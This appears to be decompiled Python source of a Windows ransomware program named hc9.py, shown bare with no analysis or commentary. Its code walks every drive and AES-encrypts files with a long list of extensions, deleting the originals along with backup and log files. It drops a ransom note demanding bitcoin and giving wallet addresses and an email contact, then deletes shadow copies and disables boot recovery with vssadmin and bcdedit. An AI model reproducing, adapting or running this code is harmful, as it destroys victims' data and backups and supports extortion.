hc9-81.pyc_dis

1. # Embedded file name: hc9.py
2. import win32api
3. from Crypto.Hash import SHA256
4. from Crypto.Cipher import AES
5. import os, random, sys
6. import subprocess
7. import base64
8. suffix = '.GOTYA'
9. valid_extension = ['.txt',
10. '.exe',
11. '.php',
12. '.pl',
13. '.log',
14. '.vhd',
15. '.vhdx',
16. '.lic',
17. '.cab',
18. '.7z',
19. '.rar',
20. '.m4a',
21. '.wma',
22. '.avi',
23. '.wmv',
24. '.csv',
25. '.d3dbsp',
26. '.sc2save',
27. '.sie',
28. '.sum',
29. '.ibank',
30. '.t13',
31. '.t12',
32. '.qdf',
33. '.gdb',
34. '.tax',
35. '.pkpass',
36. '.bc6',
37. '.bc7',
38. '.bkp',
39. '.qic',
40. '.bkf',
41. '.sidn',
42. '.sidd',
43. '.mddata',
44. '.itl',
45. '.itdb',
46. '.icxs',
47. '.hvpl',
48. '.hplg',
49. '.hkdb',
50. '.mdbackup',
51. '.syncdb',
52. '.gho',
53. '.cas',
54. '.svg',
55. '.map',
56. '.wmo',
57. '.itm',
58. '.sb',
59. '.fos',
60. '.mcgame',
61. '.vdf',
62. '.ztmp',
63. '.sis',
64. '.sid',
65. '.ncf',
66. '.menu',
67. '.layout',
68. '.dmp',
69. '.blob',
70. '.esm',
71. '.001',
72. '.vtf',
73. '.dazip',
74. '.fpk',
75. '.mlx',
76. '.kf',
77. '.iwd',
78. '.vpk',
79. '.tor',
80. '.psk',
81. '.rim',
82. '.w3x',
83. '.fsh',
84. '.ntl',
85. '.arch00',
86. '.lvl',
87. '.snx',
88. '.cfr',
89. '.ff',
90. '.vpp_pc',
91. '.lrf',
92. '.m2',
93. '.mcmeta',
94. '.vfs0',
95. '.mpqge',
96. '.kdb',
97. '.db0',
98. '.mp3',
99. '.upx',
100. '.rofl',
101. '.hkx',
102. '.bar',
103. '.upk',
104. '.das',
105. '.iwi',
106. '.litemod',
107. '.asset',
108. '.forge',
109. '.ltx',
110. '.bsa',
111. '.apk',
112. '.re4',
113. '.sav',
114. '.lbf',
115. '.slm',
116. '.bik',
117. '.epk',
118. '.rgss3a',
119. '.pak',
120. '.big',
121. '.unity3d',
122. '.wotreplay',
123. '.xxx',
124. '.desc',
125. '.py',
126. '.m3u',
127. '.flv',
128. '.js',
129. '.css',
130. '.rb',
131. '.png',
132. '.jpeg',
133. '.p7c',
134. '.p7b',
135. '.p12',
136. '.pfx',
137. '.pem',
138. '.crt',
139. '.cer',
140. '.der',
141. '.x3f',
142. '.srw',
143. '.pef',
144. '.ptx',
145. '.r3d',
146. '.rw2',
147. '.rwl',
148. '.raw',
149. '.raf',
150. '.orf',
151. '.nrw',
152. '.mrwref',
153. '.mef',
154. '.erf',
155. '.kdc',
156. '.dcr',
157. '.cr2',
158. '.crw',
159. '.bay',
160. '.sr2',
161. '.srf',
162. '.arw',
163. '.3fr',
164. '.dng',
165. '.jpeg',
166. '.jpg',
167. '.cdr',
168. '.indd',
169. '.ai',
170. '.eps',
171. '.pdf',
172. '.pdd',
173. '.psd',
174. '.dbfv',
175. '.mdf',
176. '.wb2',
177. '.rtf',
178. '.wpd',
179. '.dxg',
180. '.xf',
181. '.dwg',
182. '.pst',
183. '.accdb',
184. '.mdb',
185. '.pptm',
186. '.pptx',
187. '.ppt',
188. '.xlk',
189. '.xlsb',
190. '.xlsm',
191. '.xlsx',
192. '.xls',
193. '.wps',
194. '.docm',
195. '.docx',
196. '.doc',
197. '.odb',
198. '.odc',
199. '.odm',
200. '.odp',
201. '.ods',
202. '.odt',
203. '.sql',
204. '.zip',
205. '.tar',
206. '.tar.gz',
207. '.tgz',
208. '.biz',
209. '.ocx',
210. '.html',
211. '.htm',
212. '.3gp',
213. '.srt',
214. '.cpp',
215. '.mid',
216. '.mkv',
217. '.mov',
218. '.asf',
219. '.mpeg',
220. '.vob',
221. '.mpg',
222. '.fla',
223. '.swf',
224. '.wav',
225. '.qcow2',
226. '.vdi',
227. '.vmdk',
228. '.vmx',
229. '.gpg',
230. '.aes',
231. '.ARC',
232. '.PAQ',
233. '.tar.bz2',
234. '.tbk',
235. '.djv',
236. '.djvu',
237. '.bmp',
238. '.cgm',
239. '.tif',
240. '.tiff',
241. '.NEF',
242. '.cmd',
243. '.class',
244. '.jar',
245. '.java',
246. '.asp',
247. '.brd',
248. '.sch',
249. '.dch',
250. '.dip',
251. '.vbs',
252. '.asm',
253. '.pas',
254. '.ldf',
255. '.ibd',
256. '.MYI',
257. '.MYD',
258. '.frm',
259. '.dbf',
260. '.SQLITEDB',
261. '.SQLITE3',
262. '.asc',
263. '.lay6',
264. '.lay',
265. '.ms11 (Security copy)',
266. '.sldm',
267. '.sldx',
268. '.ppsm',
269. '.ppsx',
270. '.ppam',
271. '.docb',
272. '.mml',
273. '.sxm',
274. '.otg',
275. '.slk',
276. '.xlw',
277. '.xlt',
278. '.xlm',
279. '.xlc',
280. '.dif',
281. '.stc',
282. '.sxc',
283. '.ots',
284. '.ods',
285. '.hwp',
286. '.dotm',
287. '.dotx',
288. '.docm',
289. '.DOT',
290. '.max',
291. '.xml',
292. '.uot',
293. '.stw',
294. '.sxw',
295. '.ott',
296. '.csr',
297. '.key',
298. 'wallet.dat']
299.  
300. def encrypt(key, file_name):
301. chunk_s = 65536
302. output_file = os.path.join(os.path.dirname(file_name), os.path.basename(file_name) + suffix)
303. fsize = str(os.path.getsize(file_name)).zfill(16)
304. ini_vect = ''
305. for i in range(16):
306. ini_vect += chr(random.randint(0, 255))
307.  
308. encryptor = AES.new(key, AES.MODE_CBC, ini_vect)
309. with open(file_name, 'rb') as infile:
310. with open(output_file, 'wb') as outfile:
311. outfile.write(fsize)
312. outfile.write(ini_vect)
313. while True:
314. chunk = infile.read(chunk_s)
315. if len(chunk) == 0:
316. break
317. elif len(chunk) % 16 != 0:
318. chunk += ' ' * (16 - len(chunk) % 16)
319. outfile.write(encryptor.encrypt(chunk))
320.  
321.  
322. def getDigest(password):
323. hasher = SHA256.new(password)
324. return hasher.digest()
325.  
326.  
327. readmename = 'RECOVERY.txt'
328.  
329. def files2crypt(path):
330. allFiles = []
331. for root, subfiles, files in os.walk(path):
332. if 'System32' in root:
333. pass
334. for names in files:
335. allFiles.append(os.path.join(root, names))
336.  
337. return allFiles
338.  
339.  
340. def run_crypt():
341. drives = win32api.GetLogicalDriveStrings()
342. drives = drives.split('\x00')[:-1]
343. if len(sys.argv) < 2:
344. print 'File Corrupted'
345. sys.exit(0)
346. computer_id = base64.b64encode(str(os.environ['COMPUTERNAME']) + '-081')
347. trukns = '9080(*{){){){){){){){){){){){){){){\n O489BU84BU84BU94BU94BU94UB94BU9B4U9B\n 2U0B202..0H2.H20.H2.0H2.0H2.0H2.0H\n SOH8484BU9O48BU984BUO948UBO498BO49U8BO49U8B\n o(EH*e(d#*(*!@$&(*@&#$(*#&$(*273998374987#(*$&(#$*987987$(*&#$(*#&$(&\n 98798&#$(*&(9879*#$&(*&(*&9*&(*&('
348. password = sys.argv[1]
349. if len(sys.argv) == 3:
350. print 'Testing ' + sys.argv[2]
351. encrypt(getDigest(password), str(sys.argv[2]))
352. sys.exit(0)
353. addresses = ['1CoxQUgDxbxcxFuU7u3nBZRYitouNJKyZs',
354. '1ADFwZU8pR2z2CUUMNNRnczWUFkjBLybRj',
355. '14waKKzAEQbTmM1Wyfax2N1cgjJbHjhH7J',
356. '1C9veduaMxAy5nEAxBqwLqZ33ujPfeZ8z9']
357. readme_str = '\nALL YOUR FILES WERE ENCRYPTED. \nTO RESTORE, YOU MUST SEND $700 BTC FOR ONE COMPUTER\nOR $5,000 BTC FOR ALL NETWORK\n'
358. readme_str += 'ADDRESS: ' + random.choice(addresses)
359. readme_str += '\nBEFORE PAYMENT SENT EMAIL m4zn0v@keemail.me\n'
360. readme_str += 'ALONG WITH YOUR IDENTITY: ' + computer_id
361. readme_str += '\nAND A SAMPLE FILE AS PROOF OF DECRYPT\n'
362. readme_str += '\nNOT TO TURN OFF YOUR COMPUTER, UNLESS IT WILL BREAK\n'
363. readme_str += '\n'
364. for drive in drives:
365. for file_pnt in files2crypt(drive):
366. if os.path.basename(file_pnt).endswith(suffix) or os.path.basename(sys.executable) in file_pnt or os.path.basename(file_pnt).endswith('PsExec.exe') or 'RECOVERY.txt' in os.path.basename(file_pnt):
367. pass
368. else:
369. extension = str(os.path.splitext(file_pnt)[1])
370. if extension.lower() in valid_extension:
371. try:
372. encrypt(getDigest(password), str(file_pnt))
373. os.remove(file_pnt)
374. except:
375. pass
376.  
377. elif '.bak' in extension or '.log' in extension:
378. try:
379. os.remove(file_pnt)
380. except:
381. pass
382.  
383. for root, subfiles, files in os.walk(drive):
384. if 'System32' in root:
385. pass
386. try:
387. readme = open(os.path.join(root, readmename), 'w')
388. readme.write(readme_str)
389. readme.close()
390. except:
391. pass
392.  
393. subprocess.Popen('wmic process call create'.split() + ['cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'])
394. sys.exit(0)
395.  
396.  
397. run_crypt()